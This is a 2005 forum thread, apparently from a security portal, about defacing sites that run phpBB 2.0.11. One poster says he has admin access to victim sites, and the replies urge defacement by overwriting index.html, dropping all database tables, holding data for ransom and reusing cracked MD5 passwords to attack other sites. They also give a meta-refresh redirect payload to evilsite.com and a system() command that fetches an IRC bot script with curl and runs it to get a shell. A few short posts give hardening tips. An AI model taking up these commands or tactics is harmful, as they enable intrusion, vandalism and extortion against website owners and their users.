|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 88
Members: 0
Total: 88
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpBB.2.0.11 Further Xploit |
|
Posted: Mon Mar 21, 2005 9:12 am |
|
|
xtremeshell |
Regular user |
|
|
Joined: Mar 21, 2005 |
Posts: 6 |
Location: Somewhere In Hell !! |
|
|
|
|
|
|
HI... Im a nu member here.. Shout Hi all !! to the community
I've read n xploit some sites under these bug ( Using Cookies in Mozilla ) Now I've the admin panel at the victim sites. When I see Zone-H, Im impressed.. there is so many sites has been defaced with this bug ( ex : http://sample.com/forum/ ) A lot of them named their community as a Turkish Hacker... One thing that I wanna ask, how they can defacing the forum with a full page ?? ( it's not just the header.. ) How can they do that ?? I try to read n learn the code that creating the defaced pages.. and it's looks like they has writed the script ( it's a java ) to created an open window to fulfill the real forum page )
After that, I try to do the same thing. But I dont know exactly where I supposed to write the code. I guess , they write the code in the forum templates.. but when I go to the templates panel, I can't anythink to paste my codes. There's only an input box to changing the color of templates, the fonts, and other.. Should I paste the code there ???
Maybe Im just a nubie.. but at least, before I posting this massage.. I've try.. but I failed..
ThnX |
|
|
|
|
|
|
|
|
Posted: Mon Mar 21, 2005 10:41 am |
|
|
KingOfSka |
Advanced user |
|
|
Joined: Mar 13, 2005 |
Posts: 61 |
|
|
|
|
|
|
|
if you can execute command on remote machine you could try "echo defaced > index.html" , or get the admin md5 password hash, crack it, and try it on with ftp then overwrite index.html |
|
|
|
|
|
|
|
|
Posted: Mon Mar 21, 2005 12:22 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
I'd just upload an empty db that drops all tables.... but thats me. I dont really want people knowing it was me. Thats noobish. Just back up their DB first and then you could hold it for Ransom if they never backed up. Or you could use it to gain MD5s of other users who also have sites and emails and then you could attack their sites (if the password is the same) and backup their databases too on a never ending cycle or use their emails to spam someone you hate........ Someone should make up a phpbb sploiting group (if they are keen enough) where certain users of the group get tasks to sploit certain sites and download a new Database. If an admin from a phpbb 2.0.13 site signs up on a 2.0.1-2.0.12 site with the same password then they are fucking stupid because its just as bad as running 2.0.1-2.0.12 themselves if someone exploits the site they signed up for. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Mon Mar 21, 2005 6:25 pm |
|
|
Injector |
Active user |
|
|
Joined: Dec 29, 2004 |
Posts: 49 |
|
|
|
|
|
|
|
Those idots so called "Turkish hackers" are anything their just a bunch of script kiddies with no skills.
Anyways if it was me just make a simple website then redirect the forum on that website.
For phpbb javascript, html etc. are allowed when you are writing the description, title etc.
Just go and write this on the description
"<META HTTP-EQUIV="refresh" content="1;URL=http://www.evilsite.com">" |
|
|
|
|
|
|
|
|
Posted: Tue Mar 22, 2005 1:56 am |
|
|
xtremeshell |
Regular user |
|
|
Joined: Mar 21, 2005 |
Posts: 6 |
Location: Somewhere In Hell !! |
|
|
|
|
|
|
Thnx for the rept... But I guess it's wasn't a nice answer for me ( privately, sorry If I have a bad words ). Because I've doing some thing like that.. and yeah It's working.. but I still confused and verry interesting with the way they deface the phpBB forums. It's looks like Advanced Guestbook 2.2, the script was exactly same..
they put the code, and when the browser execute the forums/guestbook, the script will appearing a window/table that will be covering the real pages..
Once again.. thanX for the rept.. Nice to join this forum, a lot of xtreme-scripter here..
Gracias... |
|
|
|
|
|
|
|
|
Posted: Tue Mar 22, 2005 6:23 am |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
heheh xD
1 - zone-h only redirected to lammer site hackmsn.net, i deface this site for lammer
2- phpbb xpl much kids use system("cd ..;cd ..;ls") and not know more methods echo owned by noob.
Correct method go for root account is system("cd /tmp;curl -o ircbotfirewallown.pl; perl ircbotfirewallown.pl), go to irc room and wait you shell . detect kernel version and exec xpl for root in minutes or if attacker is spammer you have problems
||| This method is very danger for administrators, i recomend disable all functions shell exec, system , ALLLLL and scriptkiddies owned ||| |
|
|
|
|
Posted: Tue Mar 22, 2005 12:27 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Good old meta refresh......... |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Tue Mar 22, 2005 2:31 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
LINUX wrote: | heheh xD
1 - zone-h only redirected to lammer site hackmsn.net, i deface this site for lammer
2- phpbb xpl much kids use system("cd ..;cd ..;ls") and not know more methods echo owned by noob.
Correct method go for root account is system("cd /tmp;curl -o ircbotfirewallown.pl; perl ircbotfirewallown.pl), go to irc room and wait you shell . detect kernel version and exec xpl for root in minutes or if attacker is spammer you have problems
||| This method is very danger for administrators, i recomend disable all functions shell exec, system , ALLLLL and scriptkiddies owned ||| |
disable = passthru , exec , system
safe_mode = on
allow_url_fopen = off
display_error =off
n else,
fit it with all you need ,
set all with restrict checking |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Tue Mar 22, 2005 2:46 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
Injector wrote: | Just go and write this on the description
"<META HTTP-EQUIV="refresh" content="1;URL=http://www.evilsite.com">" |
maybe "<META HTTP-EQUIV="refresh" content="1;URL=http://www.waraxe.us">"
LOL , coz i remember that Heinzt post it before the phpbb team realize it
CMIIW |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Wed Mar 23, 2005 10:09 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|